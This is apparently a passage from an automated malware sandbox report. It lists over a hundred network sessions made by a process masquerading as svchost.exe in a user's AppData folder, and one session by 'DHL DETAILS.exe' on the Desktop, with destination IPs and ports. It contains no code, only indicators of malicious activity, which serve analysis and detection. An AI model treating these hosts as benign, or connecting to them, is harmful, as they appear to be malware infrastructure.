                                                                                    6775192.168.2.562206121.164.200.18108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6776192.168.2.558281162.223.94.1648043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6777192.168.2.558181186.159.3.1935686143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6778192.168.2.56058559.153.158.190312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6779192.168.2.56469545.81.232.176155356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6780192.168.2.56223691.134.140.160914156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6781192.168.2.562385104.16.106.2348056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6782192.168.2.562258184.185.2.12414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6783192.168.2.562261174.138.114.2268056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6784192.168.2.558163171.250.222.13108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6785192.168.2.562246202.162.219.10108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6786192.168.2.56227654.248.238.1108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6787192.168.2.559335103.76.253.66312943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6788192.168.2.56225643.131.246.771567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6789192.168.2.562416146.190.51.181312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6790192.168.2.560960165.227.196.376189943220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6791192.168.2.56098992.204.134.385617743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6792192.168.2.558384103.35.189.217312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6793192.168.2.562467192.154.244.92900056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6794192.168.2.564806162.241.6.974562956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6795192.168.2.56097192.204.135.376296943220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6796192.168.2.56229023.137.248.197888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6797192.168.2.56230451.15.247.931637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6798192.168.2.56237618.135.211.182312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6799192.168.2.56099434.84.95.189808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6800192.168.2.562361188.166.17.18888156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6801192.168.2.562331123.56.1.50312956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6802192.168.2.5624043.10.93.50312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6803192.168.2.56235645.6.38.24808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6804192.168.2.562371177.72.82.9567856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6805192.168.2.562517104.23.126.88056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6806192.168.2.56241847.91.65.23312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6807192.168.2.56243151.75.126.1501969356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6808192.168.2.56235895.111.227.1645362556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6809192.168.2.56244580.67.8.68056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6810192.168.2.55943583.221.222.240312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6811192.168.2.562468130.162.213.175312956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6812192.168.2.56135393.188.161.848043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6813192.168.2.562554162.241.158.2046065156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6814192.168.2.562460194.182.178.90312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6815192.168.2.56253950.63.12.33936756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6816192.168.2.562529104.17.37.2358056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6817192.168.2.562469115.239.234.43730256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6818192.168.2.562574162.159.241.1608056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6819192.168.2.56247594.177.106.178232456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6820192.168.2.562457222.255.238.1598056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6821192.168.2.56161092.204.134.382567556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6822192.168.2.561472181.78.19.24299943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6823192.168.2.562446203.171.19.988056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6824192.168.2.562462138.36.150.16108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6825192.168.2.562451202.139.198.15303056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6826192.168.2.56250418.166.142.180108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6827192.168.2.56156651.89.173.401105856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6828192.168.2.56146559.15.28.76312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6829192.168.2.562544119.28.4.112999943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6830192.168.2.56255294.30.152.1728056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6831192.168.2.562536182.106.220.252909156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6832192.168.2.561490159.223.71.715121343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6833192.168.2.55947784.47.145.189808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6834192.168.2.560926142.54.235.9414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6835192.168.2.560884192.252.216.81414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6836192.168.2.56256243.133.70.571567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6837192.168.2.562572203.19.38.114108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6838192.168.2.562646104.16.109.1438056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6839192.168.2.562645192.154.244.92900056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6840192.168.2.5624865.44.42.1155838656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6841192.168.2.56263166.228.140.209889956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6842192.168.2.56257620.111.54.16812356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6843192.168.2.56265745.12.30.2318056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6844192.168.2.56107743.255.113.232808143220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6845192.168.2.56125546.105.42.230312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6846192.168.2.56114064.76.106.18808043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6847192.168.2.56131537.187.77.584950743220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6848192.168.2.56141172.167.221.1455033543220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6849192.168.2.561276171.247.204.98808043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6850192.168.2.56138751.158.64.1301637943220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6851192.168.2.561425161.97.173.426228943220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6852192.168.2.56145094.23.220.1364076743220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6853192.168.2.561313197.243.20.1878043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6854192.168.2.561395172.232.111.2478043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6855192.168.2.561866165.227.196.376339943220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6856192.168.2.561461103.97.179.115108043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6857192.168.2.562664104.24.193.1868056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6858192.168.2.561899121.171.57.2312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6859192.168.2.562567103.49.202.2528056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6860192.168.2.56259360.190.68.154730256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6861192.168.2.56264938.162.8.232312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6862192.168.2.562594120.79.101.0888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6863192.168.2.561685210.72.11.46312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6864192.168.2.562009189.240.60.163909056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6865192.168.2.562013192.163.200.1965955956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6866192.168.2.55862345.117.179.1791782743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6867192.168.2.562641121.164.200.18108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6868192.168.2.54960552.151.210.204900043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6869192.168.2.5626408.222.164.2051567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6870192.168.2.562620183.230.162.122909156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6871192.168.2.56499491.142.222.841226656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6872192.168.2.56208660.188.102.2251808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6873192.168.2.562076139.198.120.152952756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6874192.168.2.56268623.137.248.197888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6875192.168.2.56269118.135.211.182312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6876192.168.2.56268043.131.246.771567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6877192.168.2.56268851.15.247.931637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6878192.168.2.562684195.90.216.75108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6879192.168.2.564653181.129.183.19532816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6880192.168.2.562724104.18.81.768056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6881192.168.2.562747104.17.50.458056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6882192.168.2.562766162.159.242.628056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6883192.168.2.562678202.162.219.10108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6884192.168.2.562070103.146.137.5108156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6885192.168.2.562744147.124.212.311327656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6886192.168.2.56266894.131.14.66108156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6887192.168.2.56512095.84.166.138808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6888192.168.2.56516291.214.31.234808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6889192.168.2.56285845.144.30.20544356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6890192.168.2.56286445.144.30.20544356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6891192.168.2.562698178.49.22.23108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6892192.168.2.56286745.144.30.20544356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6893192.168.2.56286845.144.30.20544356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6894192.168.2.562787107.175.37.1784302956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6895192.168.2.565379162.240.208.984370443080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6896192.168.2.564881132.148.154.985096556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6897192.168.2.564898102.132.49.12808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6898192.168.2.562133162.241.6.973179456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6899192.168.2.56275381.161.229.72312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6900192.168.2.56507051.161.33.2064452356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6901192.168.2.565089162.241.46.404144256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6902192.168.2.56272180.67.8.68056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6903192.168.2.562734217.182.129.103312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6904192.168.2.559892199.58.185.9414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6905192.168.2.56282746.51.249.135312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6906192.168.2.56290131.7.65.1844356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6907192.168.2.56290331.7.65.1844356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6908192.168.2.56290431.7.65.1844356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6909192.168.2.56290631.7.65.1844356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6910192.168.2.558705104.248.158.786172543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6911192.168.2.565041101.133.162.23889943080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6912192.168.2.56218147.96.145.14888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6913192.168.2.562810115.239.234.43730256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6914192.168.2.562842119.28.4.112999956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
